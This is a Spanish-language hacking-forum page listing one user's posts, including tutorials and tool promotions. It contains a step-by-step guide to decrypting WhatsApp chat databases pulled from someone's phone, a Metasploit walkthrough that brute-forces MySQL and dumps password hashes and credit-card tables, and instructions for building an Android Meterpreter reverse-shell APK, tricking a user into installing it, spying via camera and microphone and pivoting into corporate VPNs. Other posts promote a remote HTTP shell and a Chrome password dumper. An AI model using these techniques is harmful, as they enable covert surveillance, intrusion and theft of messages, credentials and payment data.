Menú

Mostrar Mensajes

Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.

Mostrar Mensajes Menú

Mensajes - ZanGetsu

Páginas 1 ... 6 7 8 9 10 ... 19
#141
Hacking / Descifrando Conversaciones en Whatsapp
Abril 24, 2014, 11:30:32 AM
Hola chicos, bueno en esta noche un tanto aburrida me puse a leer (SBD) de los temas que estan en el ojo del huracan, en este caso
tome Whatsapp, una de los grandes fallos de seguridad y bueno no es nada nuevo, es referente a los ficheros DB que guarda en nuestra
SD Card, ya que cualquier persona que obtenga nuestro telefono y saque dichos archivos, bueno tendra acceso a todas las conversaciones
incluso si estas estan borradas, pasaremos a ver un poco este tema :

Utilizaremos 2 herramientas para esto:

OpenSSL : You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Sqlite Data Browser: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Bueno descargados los 2 archivos procederemos a obtener algun fichero db de sus telefonos para hacer la prueba, en android solo van a su sdcard/whatsapp/database y sacamos algun fichero .db.crypt


Luego de esto procederemos a abrir nuestro OpenSSL en su interfaz que la encuentran en C:\OpenSSL-Win64\bin\Openssl y obtendremos la consola
dentro de ella lo primero que debemos hacer es mover la db extraida a la misma ruta donde esta openssl (C:\OpenSSL-Win64\bin\), teniendo esto escribiremos lo siguiente:

enc -d -aes-192-ecb -in msgstore-1.db.crypt -out msgstore.db.sqlite -K 346a23652a46392b4d73257c67317e352e3372482177652c

(codigo extraido de securitybydefault)

En donde en IN pondremos el nombre del archivo, en nuestro caso seria msgstore-2014-0-3-05.1.db.crypt y tambien OUT .que estaria siendo el nombre del archivo saliente, msgstore.db.sqlite seguido de eso la key de decifrado AES la ponen tal cual.



Luego de esto ya tendremos nuestro .sqlite listo para abrirlo con SQLite Database Browser



Luego de cargado el archivo vamos a la pestaña Browser data y podremos ver todas las conversaciones
escritas en whatsapp



y si damos doble click sobre el mensaje, podremos verlo mas completo:


Un saludo chicos !
#142
Python / Re: PyHttpShell
Abril 14, 2014, 11:52:28 PM
jajajajja disculpen se me olvido xD You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
#143
Python / PyHttpShell
Abril 14, 2014, 11:30:34 PM

PyHttpShell es un shell escrito en python, el tráfico es a través del protocolo http utilizando un servidor en el centro

Características

Transporte a través de HTTP / HTTPS.
Soporta configuración proxy del sistema.
Varios hosts / Conexiones.
Descarga archivos a la máquina cliente.
Cambiar el tiempo del sueño de forma remota.
Funciona en Win / Mac / Linux
#144
Bugs y Exploits / Chrome Password Decryptor
Abril 14, 2014, 11:28:09 PM

Chrome Password Decryptor es la herramienta gratis para recuperar instantáneamente las contraseñas almacenadas de Google Chrome navegador.
Se detecta automáticamente la ruta del perfil de Chrome por defecto para el usuario actual y muestra todas las contraseñas de inicio de sesión almacenadas en texto claro después de descifrarlos.

Otra característica útil de esta herramienta es la opción Guardar que se puede utilizar para guardar los secretos de acceso al archivo local en formato HTML / XML / Texto estándar. Esto será muy útil en los casos siguientes :

+ Para tener copia de seguridad de los secretos de inicio de sesión para los sitios web almacenados
+ Para transferir los secretos de un sistema a otro.
+ Para almacenar las contraseñas de sitios web en la ubicación centralizada más segura
+ Para recuperar las contraseñas en caso de que Chrome no se hace accesible o no funcional.


Descarga: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

#145
Bugs y Exploits / Re:N-Stalker - Web Security Scanner
Abril 01, 2014, 02:01:32 AM
jajajjaa se me olvido subirla xD, Broma, saludos !
#146
Bugs y Exploits / N-Stalker - Web Security Scanner
Marzo 29, 2014, 02:49:17 PM

Hi chicos, navegando por la wavsep 2014, me encontre con este scan de vulnerabilidades muy novedoso, puede detectar vulnes como sql injection, Xss, entre otros, y ademas trae la opcion de OWASP Policy, para detectar vulnes segun Owasp, les dejo una imagen, para descarga el scan deben registrarse en su website:

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login




Saludos !
#147
Dudas y pedidos generales / Re:Windows 7
Marzo 05, 2014, 08:50:02 PM
en realidad yo soy de las personas que cree, que no se necesita ningun ambiente para aprender
todos piensan que por irse a linux, podran aprender mas, yo pienso que en cualquier interfaz podras aprender, sea windows o linux, las tools
tutoriales, etc estan a la mano de cualquier interfaz :D
#148
Bugs y Exploits / Atacando Mysql con Metasploit
Marzo 05, 2014, 08:44:59 PM
MySQL es una de las bases de datos más utilizadas que está siendo utilizado por muchas aplicaciones en You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login en un trabajo de pruebas de penetración es casi imposible no encontrar un sistema que va a ejecutar un You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login MySQL este artículo vamos a ver cómo podemos atacar una base de datos MySQL con la ayuda del marco de Metasploit.

Digamos que está en el ámbito de nuestra prueba de penetración es un primer paso MySQL server.The es descubrir la versión del Marco database.Metasploit tiene un módulo que nos permite encontrar la versión del database.Knowing la versión de la base de datos nos ayudará a descubrir vulnerabilidades adicionales.


Módulo Metasploit para MySQL versión enumeración

Lo único que tenemos que hacer es insertar la dirección IP remota y ejecutarlo con la orden de marcha.


Ahora podemos usar la mysql_login módulo en combinación con nuestras listas de palabras con el fin de descubrir al menos una cuenta de base de datos válido que nos permitirá iniciar sesión en el You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login MySQL es siempre una buena práctica como pruebas de penetración para comprobar la base de datos de credenciales débiles .


El escáner fue un éxito y ahora como podemos ver en los resultados que tenemos dos cuentas válidas ( invitados y de raíz ) para connection.Both remota de estas cuentas no tienen un conjunto de contraseñas.


Antes de usar estas cuentas con el fin de conectarse e interactuar directamente con la base de datos que podemos usar otros dos módulos de Metasploit que nos pueden ayudar para enumerar las cuentas de base de datos y para volcar los nombres de usuario y hashes de contraseñas del curso MySQL server.Of esto se puede hacer manualmente, pero Metasploit nos ayuda a automatizar este You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login primero vamos a configurar el módulo mysql_enum con el fin de encontrar información sobre las accouts base de datos:



Podemos ver una muestra de la salida en la siguiente imagen:


Siguiente es el momento de configurar y ejecutar el mysql_hashdump módulo con el fin de volcar los hashes de las contraseñas de todas las cuentas de base de datos:


Ahora podemos usar cualquier cliente mysql para conectarse a la database.Backtrack ha ya un cliente para que podamos usar el comando mysql-h IP-u usuario-p contraseña . En nuestro caso, nuestro IP del destino es 172.16.212.133 y lo haremos utilizar como nombre de usuario de la raíz que se ha descubierto desde el mysql_login módulo before.We se le solicitará una contraseña, pero vamos a dejarlo en blanco ya que la contraseña para la raíz cuenta está en blanco.


Ahora que estamos conectados a la base de datos, podemos utilizar el comando show databases; con el fin de descubrir las bases de datos que se almacenan en el servidor MySQL.



Como siguiente paso es elegir una base de datos y luego tratar de ver las tablas que contiene, a fin de iniciar el extracto data.We puede hacer eso con el comando <dbname> utilización y el comando show tables;


Podemos ver que hay una mesa user.We quisiera extraer los datos de esa tabla, ya que contiene los nombres de usuario y contraseñas de la system.we pueden lograr que con el comando de selección de usuario, contraseña de usuario;


Como podemos ver hay 3 cuentas con You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login blanco ahora tenemos todas las cuentas de la database.We MySQL ahora podemos descubrir mesas adicionales de otras bases de datos con el comando show tables de <dbname>;


La tabla interesante aquí es los credit_cards lo que nos gustaría poder ver el contenido de este table.We cambiarán la base de datos con el comando uso <dbname> y vamos a ejecutar el comando espectáculo * de credit_cards;


Ahora tenemos todos los detalles de tarjetas de crédito de los usuarios y todas las cuentas y contraseñas de la base de datos.

Fuente: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Les dejo un video con algo parecido :


#149
Bugs y Exploits / Denial of Service em Windows XP(Metasploit)
Marzo 05, 2014, 08:31:20 PM

El creador del video es: M0rph

Me parecio bueno compartirlo Big Grin , saludos !
#150
Dudas y pedidos generales / Re:backtrack o bugtraq Cual de los 2 me recomiendan
Febrero 13, 2014, 02:43:38 PM
No cambio backtrack por nada xD, bugtraq na no me gusto, lo probe en mi PC, intel core i3, y se me pegaba con abrir un par de cosas,
#151
Dudas y pedidos generales / Re:Como instalar paquetes .tar.gz?
Febrero 10, 2014, 12:25:18 PM
tar xzvf tuarchivo.tar.gz
#152
Cursos, manuales y libros / Hashcat Manual en Español
Febrero 08, 2014, 04:26:17 PM
1.1 VISTA GENERAL ........................................................... 5
1.2 OPCIONES ................................................................ 7
1.3 VECTORES DE ATAQUE ...................................................... 15
1.4 EJEMPLOS ................................................................ 16
1.5 ESPECIFICOS HASHCAT ..................................................... 25
2.1 OCLHASHCAT-PLUS(CUDAHASHCAT-PLUS) ....................................... 25
2.1 OPCIONES ................................................................ 27
2.2 VECTORES DE ATAQUE ...................................................... 34
2.3 RULE-BASED ATTACK ....................................................... 35
2.4 EJEMPLOS ................................................................ 39
2.5 HASHCAT UTILS ........................................................... 48
2.6 SOLUCION DE PROBLEMAS ................................................... 50
2.7 REFERENCIAS ............................................................. 50
2.8 MEJORAS ................................................................. 50

Descarga: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
#153
Python / GetSploits - search exploit-db.com database
Febrero 08, 2014, 04:23:23 PM
Este script busca exploits. documentos, shell codes, directamente de You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Código: python
#!/usr/bin/env python

#Name: getsploits.py
#Version: 0.9.2
#Author: s3my0n

#########################################################################
# getsploits searches for specific exploits/shellcode/papers from       #
# exploit-db.com .                                                      #
#                                                                       #
# Copyright (C) 2011 s3my0n                                             #
#                                                                       #
# This program is free software: you can redistribute it and/or modify  #
# it under the terms of the GNU General Public License as published by  #
# the Free Software Foundation, either version 3 of the License, or     #
# any later version.                                                    #
#                                                                       #
# This program is distributed in the hope that it will be useful,       #
# but WITHOUT ANY WARRANTY; without even the implied warranty of        #
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the         #
# GNU General Public License for more details.                          #
#                                                                       #
# You should have received a copy of the GNU General Public License     #
# along with this program.  If not, see <http://www.gnu.org/licenses/>. #
#########################################################################

import sys
import urllib2
import re
import threading
from optparse import OptionParser

class ExploitSearcher(threading.Thread):
    def __init__(self, search_url):
        threading.Thread.__init__(self)
        self.search_url = search_url
        self.results = {}
        self.error = False
       
        exp = ('<a  href="http://www.exploit-db\.com/exploits/\d+">\s*.+\s*</a>',
               'http://www.exploit-db.com/exploits/\d+')
        pap = ('<a  href="http://www.exploit-db\.com/papers/\d+">\s*.+\s*</a>',
               'http://www.exploit-db.com/papers/\d+')
        pdf = ('<a  href="http://www.exploit-db\.com/download_pdf/\d+">.+\s*</a>',
               'http://www.exploit-db.com/download_pdf/\d+')
       
        self.match_string = '%s|%s|%s' % (exp[0], pap[0], pdf[0])
        self.match_links = '%s|%s|%s' % (exp[1], pap[1], pdf[1])
       
    def getPage(self):
        try:
            self.current_page = urllib2.urlopen(self.search_url, '80').read()
        except BaseException:
            self.error = '\n[-] Error: could not connect to exploit-db.com'
    def getResultsFromPage(self, papers=False):
       
        try:
            found_results = re.findall(self.match_string, self.current_page)
        except AttributeError:
            exit(1)
           
        for i in found_results:

            name = ''.join(re.findall('>\s*.+\s*<', i))\
                    .strip('></a\n\r').replace('&lt;', '<')\
                    .replace('&gt;', '>').replace('&amp;', '&')\
                    .replace('&quot;', '"')

            link = ''.join(re.findall(self.match_links, i))
            self.results[name] = link
   
    def run(self):
        self.getPage()
        self.getResultsFromPage()
       
class SearcherController(object):
    def __init__(self, searchopts, genopts):
        def setfromdic(opt, dic):
            # Return number of a platform/type
            if (opt in dic.values()) or (opt == ''):
                return opt
            elif dic.has_key(opt):
                return dic[opt]
            else:
                return None
               
        allplatforms = {'sco':            '34', 'bsdi/x86':      '6',
                        'openbsd':        '27', 'lin/amd64':     '17',
                        'plan9':          '32', 'bsd/x86':       '5',
                        'openbsd/x86':    '28', 'hardware':      '12',
                        'bsd':            '3',  'unix':          '41',
                        'lin/x86-64':     '22', 'netbsd/x86':    '25',
                        'linux':          '16', 'solaris':       '36',
                        'ultrix':         '40', 'arm':           '46',
                        'php':            '31', 'solaris/sparc': '37',
                        'osX':            '30', 'os-x/ppc':      '29',
                        'cfm':            '47', 'generator':     '11',
                        'freebsd/x86':    '9',  'bsd/ppc':       '4',
                        'minix':          '23', 'unixware':      '42',
                        'freebsd/x86-64': '10', 'cgi':           '7',
                        'hp-ux':          '13', 'multiple':      '24',
                        'win64':          '44', 'tru64':         '39',
                        'jsp':            '15', 'novell':        '26',
                        'linux/mips':     '18', 'solaris/x86':   '38',
                        'aix':            '1',  'windows':       '45',
                        'linux/ppc':      '19', 'irix':          '14',
                        'QNX':            '33', 'lin/x86':       '21',
                        'win32':          '43', 'linux/sparc':   '20',
                        'freebsd':        '8',  'asp':           '2',
                        'any':            '0',  'sco/x86':       '35'}

        alltypes = {'any':       '0',
                    'local':     '2',
                    'papers':    '5',
                    'remote':    '3',
                    'shellcode': '4',
                    'webapps':   '6'}

        # Search options
        self.description = searchopts['DESC'].replace(' ', '+')
        self.author = searchopts['AUTH']
        self.port = searchopts['PORT']
        self.osvdb = searchopts['OSVDB']
        self.cve = searchopts['CVE']

        # Setting up platform
        self.platform = setfromdic(searchopts['PLAT'], allplatforms)
        if self.platform == None:
            print '\n[-] Error: invalid platform [%s]' % (searchopts['PLAT'])
            exit(1)

        # Setting up type
        self.type = setfromdic(searchopts['TYPE'], alltypes)
        if self.type == None:
            print '\n[-] Error: invalid type [%s]' % (searchopts['TYPE'])
            exit(1)

        # General options
        self.quiet = genopts['QUIET']
        self.output = genopts['OUTPUT']
       
        self.page = 1 # First page
        self.pages = 1 # How many pages
        self.results = {}

        self.createURL()

    def createURL(self):
        self.search_url = 'http://exploit-db.com/search/?action=search'
        self.search_url += '&filter_page=%d' % (self.page)
        self.search_url += '&filter_description=%s' % (self.description)
        self.search_url += '&filter_author=%s' % (self.author)
        self.search_url += '&filter_platform=%s' % (self.platform)
        self.search_url += '&filter_type=%s' % (self.type)
        self.search_url += '&filter_port=%s' % (self.port)
        self.search_url += '&filter_osvdb=%s' % (self.osvdb)
        self.search_url += '&filter_cve=%s' % (self.cve)

    def userOutput(self, what):
        outputs = {'How_many_pages':'\n[*] Found %d pages of results.' % (self.pages),
                   'No_results':'\n[*] "%s" was not found in the database.' % (self.description),
                   'First_connection':'\n[*] Connecting ...',
                   'Find_results':'\n[*] Searching found pages ...',
                   'Saving_links':'\n[*] Saving found results to %s'%(self.output)}
        return outputs[what]
   
    def findPageNumbers(self):
        if self.quiet != True:
            print self.userOutput('First_connection')

        exploits = '<a\s+href="http://www.exploit-db\.com/exploits/\d+">\s*.+\s*</a>'
        papers = '<a\s+href="http://www.exploit-db\.com/papers/\d+">\s*.+\s*</a>'
        pdf = '<a\s+href="http://www.exploit-db\.com/download_pdf/\d+">\s*.+\s*</a>'
       
        match_highest = 'filter_page=\d+'
       
        try:
            openpage = urllib2.urlopen(self.search_url, '80').read()
        except KeyboardInterrupt:
            print '\n[*] Aborted: exiting'
            exit(1)
        except BaseException:
            print '\n[-] Error: could not connect to exploit-db.com'
            exit(1)
        else:
            find_link = ''.join(re.findall(match_highest, openpage))
            if find_link != '':
                self.pages = max([int(i) for i in re.findall('\d+', find_link)])
            else:
                one_page_test = re.findall('%s|%s|%s'%(exploits, papers, pdf), openpage)
                if one_page_test == []:
                    print self.userOutput('No_results')
                    exit(0)
                   
        if self.quiet != True:
            print self.userOutput('How_many_pages')

    def printResults(self, results):
        for i in results:
            print '\n[+] %s' % (i)
            print '    %s' % (results[i])

    def saveLinks(self):
        if self.quiet != True:
            print self.userOutput('Saving_links')
        try:
            fopen = open(self.output, 'a')
            for i in self.results:
                fopen.write('\n%s\n%s\n'%(i, self.results[i]))
        except KeyboardInterrupt:
            print '\n[*] Aborted: exiting'
            exit(1)
        except IOError:
            print '\n[-] Error: cannot write to %s' % (self.output)
            exit(1)
        else:
            fopen.close()
           
class ArgCreator(object):
    def __init__(self):
        parser = OptionParser(add_help_option=False)
        parser.add_option('--author', dest='author', default='')
        parser.add_option('--platform', dest='platform', default='0')
        parser.add_option('--type', dest='type', default='0')
        parser.add_option('--port', dest='port', default='')
        parser.add_option('--osvdb', dest='osvdb', default='')
        parser.add_option('--cve', dest='cve', default='')
        parser.add_option('-o', dest='output', default='')
        parser.add_option('-q', action='store_true', dest='quiet', default=False)
        parser.add_option('-h', '--help', action='store_true', dest='help', default=False)
        (self.options, args) = parser.parse_args()

        self.checkArgs() # Parsing arguments

    def helpscreen(self):
        return '''
  getsploits v0.9.2
  s3my0n RuSH4ck3R[at]gmail[dot]com


  Usage: getsploits.py [OPTIONS] [SEARCH_OPTIONS] description

  Example: getsploits.py -o linux_shellcode.txt --type shellcode --platform linux ""
           getsploits.py -o freebsd_x86-64_local.txt --platform 10 --type 2 ""
           getsploits.py --author maxe vbulletin

  [Options]:
  -o: Write results to a file
  -q: Quiet mode
  -h: Show this help screen

  [Search Options]:
  --author:
  --platform
  --type
  --port
  --osvdb
  --cve

  [Platforms]:
    0: any (default)    12: hardware       24: multiple      36: solaris
    1: aix              13: hp-ux          25: netbsd/x86    37: solaris/sparc
    2: asp              14: irix           26: novell        38: solaris/x86
    3: bsd              15: jsp            27: openbsd       39: tru64
    4: bsd/ppc          16: linux          28: openbsd/x86   40: ultrix
    5: bsd/x86          17: linux/amd64    29: os-x/ppc      41: unix
    6: bsdi/x86         18: linux/mips     30: osx           42: unixware
    7: cgi              19: linux/ppc      31: php           43: win32
    8: freebsd          20: linux/sparc    32: plan9         44: win64
    9: freebsd/x86      21: linux/x86      33: qnx           45: windows
   10: freebsd/x86-64   22: linux/x86-64   34: sco           46: arm
   11: generator        23: minix          35: sco/x86       47: cfm
                           
  [Types]:
    0: any (default)
    2: local
    5: papers
    3: remote
    4: shellcode
    6: webapps'''

    def checkArgs(self):
        def finddesc():
            args = sys.argv[:]
            search_options = ('--author', '--platform', '--type', '--port', '--osvdb', '--cve')
            lone_options = ('-h', '-q')
            arg_options = ('-o',)
            for i in args:
                if args.index(i) == 0:
                    continue
                previous_i = args[args.index(i)-1]
                if (i in search_options) or (i in lone_options) or (i in arg_options):
                    continue
                else:
                    if previous_i in search_options:
                        continue
                    if previous_i in arg_options:
                        continue
                    elif previous_i in lone_options:
                        return i
                    else:
                        return i
            else:
                return None
               
        if (self.options.help == True) or (len(sys.argv) < 2):
            print self.helpscreen()
            exit(0)
        self.description = finddesc() # Description string
        if self.description == None:
            print '[-] Error: please enter exploit description or enter "" instead of description.'
            exit(1)
           
    def search_options(self):
        return {'DESC':self.description,
                'AUTH':self.options.author,
                'PLAT':self.options.platform,
                'TYPE':self.options.type,
                'PORT':self.options.port,
                'OSVDB':self.options.osvdb,
                'CVE':self.options.cve}
    def general_options(self):
        return {'OUTPUT':self.options.output,
                'QUIET':self.options.quiet}

def main():
    ac = ArgCreator()
    search_options = ac.search_options()
    general_options = ac.general_options()

    sc = SearcherController(search_options, general_options)
    sc.findPageNumbers() # Find out how many pages there are

    # Searching
    threads = []
    for i in xrange(1, sc.pages+1):
        sc.page = i # Changing page number
        sc.createURL() # Update search url with current page number
        t = ExploitSearcher(sc.search_url)
        threads.append(t)
    nthreads = len(threads)
    if sc.quiet != True:
        print sc.userOutput('Find_results')
   
    # Running threads
    try:
        for i in xrange(nthreads):
            threads[i].start()
        for i in xrange(nthreads):
            threads[i].join()
            # Getting thread's results
            error = threads[i].error
            if error:
                print error
                exit(1)
            else:
                new_results = threads[i].results
                sc.results.update(new_results)
                if sc.quiet != True:
                    sc.printResults(new_results)
    except KeyboardInterrupt:
        print '[*] Aborted: exiting'
        exit(1)
    else:
        # Saving links
        if sc.output != '':
            sc.saveLinks()
   
if __name__=='__main__':
    main()


#Author: s3my0n
#154
Hacking / Re:Faraday: Coperative Pentesting
Enero 28, 2014, 04:43:42 AM
ya estaba posteado : You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

aunque tu explicacion es muy buena :D
#155
Bugs y Exploits / Nuevo Meterpreter para Android
Enero 22, 2014, 03:54:02 PM
Hace ya una buena temporada que venía haciendo un "marcaje de cerca" a ESTE "Pull Request" que existía en el GitHub sobre una iniciativa para portar el Meterpreter Java para Android, que aunque pueda parecer trivial porque las aplicaciones de Android se programan en Java, no es exactamente portable el Java "habitual" que el Java para la máquina virtual Dalvik que tenemos en nuestros Android.

Durante este tiempo he ido bajándome el fork de Metasploit de timwr, que ha sido una de las personas que más han contribuido en esta nueva versión del Meterpreter, y la verdad es que lleva tiempo siendo bastante estable, salvo algún error que me encontré que tuve que arreglar desempaquetando el APK, modificando alguna cosa y volviéndolo a empaquetar para su uso.

Finalmente, después de mucha espera, hoy mismo he visto que se ha hecho un commit de esta funcinalidad hace unos pocos días, por lo que en teoría ya tenéis la funcionalidad en el fork principal de Metasploit. Vamos a ver si es verdad:

$ ./msfupdate

  • Attempting to update the Metasploit Framework...

  • [...]
    create mode 100644 external/source/javapayload/androidpayload/library/src/androidpayload/stage/Meterpreter.java
    create mode 100644 external/source/javapayload/androidpayload/library/src/androidpayload/stage/Shell.java
    create mode 100644 external/source/javapayload/androidpayload/library/src/androidpayload/stage/Stage.java
    create mode 100644 external/source/javapayload/androidpayload/library/src/com/metasploit/meterpreter/AndroidMeterpreter.java
    create mode 100644 external/source/javapayload/androidpayload/library/src/com/metasploit/meterpreter/android/stdapi_fs_file_expand_path_android.java
    create mode 100644 external/source/javapayload/androidpayload/library/src/com/metasploit/meterpreter/android/stdapi_sys_process_get_processes_android.java[/b]

    La cosa pinta bien ¿no? Sí que parece que hay ficheros que nos hacen pensar que la funcionalidad del nuevo Meterpreter para Android ha sido incorporada. Vamos a ver la ayuda de msfpayload, a ver si confirma nuestra teoría:

    $ ./msfpayload -l | grep -i android
    android/meterpreter/reverse_tcp Connect back stager, Run a meterpreter server on Android
    android/shell/reverse_tcp Connect back stager, Spawn a piped command shell (sh)

    ¡Genial! Parece que se acabó eso de tener que instalar dos forks de Metasploit, uno el estandar y el otro con esta funcionalidad. Vamos a generar un APK con un Meterpreter con reverse shell, a ver si conseguimos que alguien se lo instale y jugamos un poco con él Smile

    $ ./msfpayload android/meterpreter/reverse_tcp LHOST=11.22.33.44 R > meter.apk

    Tenemos que decirle a msfpayload que use la salida RAW. Eso en otros payloads nos sacaría el shellcode sin formato, pero en el caso de Android nos saca el APK. Veámoslo:

    $ file meter.apk
    meter.apk: Zip archive data, at least v2.0 to extract

    Nos dice que es un ZIP, pero es que en realidad un fichero APK no es más que un ZIP que contiene una serie de ficheros con un formato determinado. Ahora solo tenemos que instalar la aplicación en un Android, generalmente con algún tipo de engaño. Este APK es más bien una prueba de concepto, porque viene con un icono azul de Metasploit, pero podría esconderse el mismo código en una aplicación que "diera el pego" y el efecto sería el mismo. Al arrancar la aplicación se recibe la conexión inversa.

    $ ./msfcli multi/handler PAYLOAD=android/meterpreter/reverse_tcp LHOST=0.0.0.0 E


    Ya hemos comprobado que el Meterpreter para Android, funcionar funciona, pero lo que no sabemos es que funcionalidades tiene. Evidentemente, como sucede en las versiones Java y Linux, la funcionalidad es mucho más reducida que en la versión para Windows, pero aún así hay funcionalidades muy interesantes que nos pueden servir para ilustrar los riesgos de seguridad de un dispositivo móvil. Por ejemplo, viene con funcionalidad para realizar fotografías empleando tanto la cámara delantera como la trasera, si estuviera disponible. Otra funcionalidad que me pareció extremadamente interesante fue la posibilidad de activar el micrófono y usar el terminal como un micro oculto. Esta no conseguí hacerla funcionar en el teléfono que lo probé, pero supongo que poco a poco irán puliendo estos detalles.


    Imagínatelo, comprometer un terminal móvil y poder escuchar y ver por donde va el usuario. Sin duda un gran trabajo de la gente que ha contribuido con este módulo y de la gente de Rapid7 al ayudar a su integración en Metasploit.

    Otra de las funcionalidades que pueden impresionar menos a nivel mediático, pero que resultan muy peligroso a nivel corporativo, es la posibilidad de hacer port-relaying desde el terminal móvil. Digo que interesa a nivel corporativo porque, a un usuario "de casa", no se saca nada haciendo un port-relay, pero en una empresa... ¿qué ocurre si hacemos esto cuando el usuario tiene levantada la VPN que le da acceso a la red interna de la empresa?

    meterpreter> portfwd add -l 80 -r 192.168.100.10 -p 80
    • Local TCP relay created: 0.0.0.0:80 <-> 192.168.100.10:80
      [/b]
      Lo dicho, un gran trabajo de la colaboración de la comunidad y del equipo de desarrollo de Metasploit que seguro que nos va a dar mucho juego.

      Fuete: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
#156
Seguridad web y en servidores / GoSquared - Análisis en tiempo real de tu Web
Enero 04, 2014, 02:52:35 AM
GoSquared es una empresa que ofrece monitoreo total de nuestra web, tiene planes muy buenos y entre sus cualidades encontramos:

+ Consola en tiempo real de GoSquared le permite ver lo que está ocurriendo en el sitio Web de un solo vistazo.
+ Ver lo que es popular en su sitio ahora.
+ Ver dónde vienen sus visitantes y si están participando con su contenido.
+ Monitorear el impacto y la eficacia de las campañas en tiempo real.
+ Recibir alertas detalladas cuando los niveles de tráfico en el sitio están fuera de lo común.
+ Reaccionar a la actividad del visitante en su sitio antes de que la oportunidad ha pasado.


Pueden disfrutar de su version trial : You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

O tambien acceder a un demo online, donde se ven algunas de sus cualidades : You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Les dejo ademas un video:



Saludos !
#157
Bugs y Exploits / Re:Vuln Hunter 2014 - Website Vulnerability Scanner
Enero 04, 2014, 02:49:21 AM
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Es la misma solo que ZanGetsu, tiene el hobbie de ir subiendo todo a hosts adicionales XD.

Regards,
Snifer

jajajja, es mi mania personal :D
#158
Bugs y Exploits / Vuln Hunter 2014 - Website Vulnerability Scanner
Diciembre 29, 2013, 04:09:50 PM

Features:

Dork Search
Dorks Included
Custom Dork Search
Live Website Injection Viewer
Live Url Injection Viewer
Live Vulnerability Found Counter
Mass SQLi ((i)Injection) Scanner
Mass XSS Injection Scanner
Mass /etc/passwd Injection Scanner
Single SQLi Scanner
Single XSS Scanner
Single /etc/passwd Scanner
SQLi - Commands, Examples
XSS - Commands, Examples
/etc/passwd - Commands, Examples
Send to SQLi, XSS, etc/passwd Scanner
Save SQLi, XSS, etc/passwd Vulnerabilities
Clear SQLi, XSS, etc/passwd Vulnerabilities
Add, Remove Dork - Dorklist
Decode and Encode Functions Text(ASCii) to:
Text to Base64 - Base64 to Text De-Encode
Text to Binary - Binary to Text De-Encode
Text to Hex - Hex to Text De-Encode
Decimal to Octal - Octal to Decimal

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Saludos !
#159
Bugs y Exploits / Faraday - Penetration Test IDE
Diciembre 20, 2013, 03:11:48 AM

Faraday introduce un nuevo concepto (IPE) Integrado Penetración-Entorno de prueba de un IDE Ensayo de penetración multiusuario. Diseñado para su distribución, la indexación y el análisis de los datos generados durante el proceso de una auditoría de seguridad. El objetivo principal de Faraday es volver a utilizar las herramientas disponibles en la comunidad para aprovecharse de ellos de una manera multiusuario.

Características:

* 40 Plugins (Metasploit, AMAP, Arachini, Dnsenum, Medusa, Nmap, Nessus, w3af, Zap y más)!
* Soporte conjunto
* Información Resaltado
* Filtrado de Conocimiento
* Información Dashboard
* Detección de conflictos
* Soporte para múltiples espacios de trabajo
* IntelliSense Soporte
* Fácil Plugin para el Desarrollo


Requerimientos :

Python 2.6.x and 2.7.x
- Qt3
- CouchDB >= 1.2.0
- The following python libs:
  - mockito
  - couchdbkit
  - whoosh
  - argparse
  - psycopg2
  - IPy
  - requests


Web oficial: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Descarga: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Saludos !
#160
Presentaciones y cumpleaños / Re:Bienvenida a mi!
Diciembre 18, 2013, 12:53:08 PM
bienvenido !
Páginas 1 ... 6 7 8 9 10 ... 19